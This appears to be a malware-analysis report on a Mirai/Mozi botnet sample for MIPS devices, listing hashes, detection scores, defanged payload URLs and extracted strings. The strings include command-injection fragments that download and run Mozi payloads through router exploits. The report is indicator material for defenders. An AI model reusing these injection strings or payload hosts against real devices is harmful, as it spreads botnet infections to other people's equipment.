i

First submission 2024-08-26 07:22:11 Last sumbission 2024-09-05 12:46:05

File details

File type: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
Mime type: application/x-executable
File size: 284.48 KB (291312 bytes)
MD5: 8fabd065e7343d393a21f7bafba3cece
SHA1: a50698641c39cbfc0fd79acab70168f9ff3e9906
SHA256: b64a2606b85c9d3127d5b5f4592137eefd1604f8aa4fa5c662ba7131f59ce5d0

File features detected

Is DLL
Packers
Anti Debug
Anti VM
Signed
XOR

OSINT Enrichments

Virus Total: 42/79 VT report date: 2024-08-18 18:51:16
Malware Type 1 trojan
Threat Type 3 mirai mozi cryp

URLs, FQDN and IP indicators 11

URL Host (FQDN/IP) Date Added
hXXp://59.184.65.27:49772/i VirusTotal Report 59.184.65.27 VirusTotal Report 2024-09-05 12:46:07
hXXp://59.184.65.27:49772/bin.sh VirusTotal Report 59.184.65.27 VirusTotal Report 2024-09-05 12:29:07
hXXp://59.93.233.215:41109/i VirusTotal Report 59.93.233.215 VirusTotal Report 2024-09-05 09:54:09
hXXp://59.93.233.215:41109/bin.sh VirusTotal Report 59.93.233.215 VirusTotal Report 2024-09-05 09:23:09
hXXp://59.182.143.77:41109/i VirusTotal Report 59.182.143.77 VirusTotal Report 2024-09-04 15:56:11
hXXp://59.182.143.77:41109/bin.sh VirusTotal Report 59.182.143.77 VirusTotal Report 2024-09-04 15:42:08
hXXp://42.225.52.145:49199/bin.sh VirusTotal Report 42.225.52.145 VirusTotal Report 2024-09-02 16:55:06
hXXp://117.255.106.47:41109/i VirusTotal Report 117.255.106.47 VirusTotal Report 2024-09-01 09:27:06
hXXp://117.255.106.47:41109/bin.sh VirusTotal Report 117.255.106.47 VirusTotal Report 2024-09-01 09:04:07
hXXp://61.53.44.141:49199/i VirusTotal Report 61.53.44.141 VirusTotal Report 2024-08-30 17:15:12
hXXp://61.53.44.141:49199/Mozi.m VirusTotal Report 61.53.44.141 VirusTotal Report 2024-08-30 16:12:15

Strings analysis - File found

XML
M7c.xml

Strings analysis - Possible IPs found 10

130.239.18.159
82.221.103.244
87.98.162.88
239.255.255.250
255.255.255.255
212.129.33.59
192.168.0.100
8.8.8.8
127.0.0.1
114.114.114.114

Strings analysis - Possible URLs found 24

http://%s:%d/i
http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
http://ipinfo.io/ip
http://www.w3.org/2001/XMLSchema-instance
http://purenetworks.com/HNAP1/
http://%s:%d/Mozi.m+-O+-
http://
http://schemas.xmlsoap.org/soap/envelope/
http://%s:%d/bin.sh
http://%s:%d/bin.sh;chmod
http://%s:%d/Mozi.m
http://127.0.0.1
http://%s:%d/i;chmod
http://schemas.xmlsoap.org/soap/envelope//
http://%s:%d/Mozi.m;
http://%s:%d/Mozi.m;/tmp/Mozi.m
http://schemas.xmlsoap.org/soap/encoding/
http://%s:%d
http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://%s:%d/Mozi.a;sh$
https://
http://www.w3.org/2001/XMLSchema
http://upx.sf.net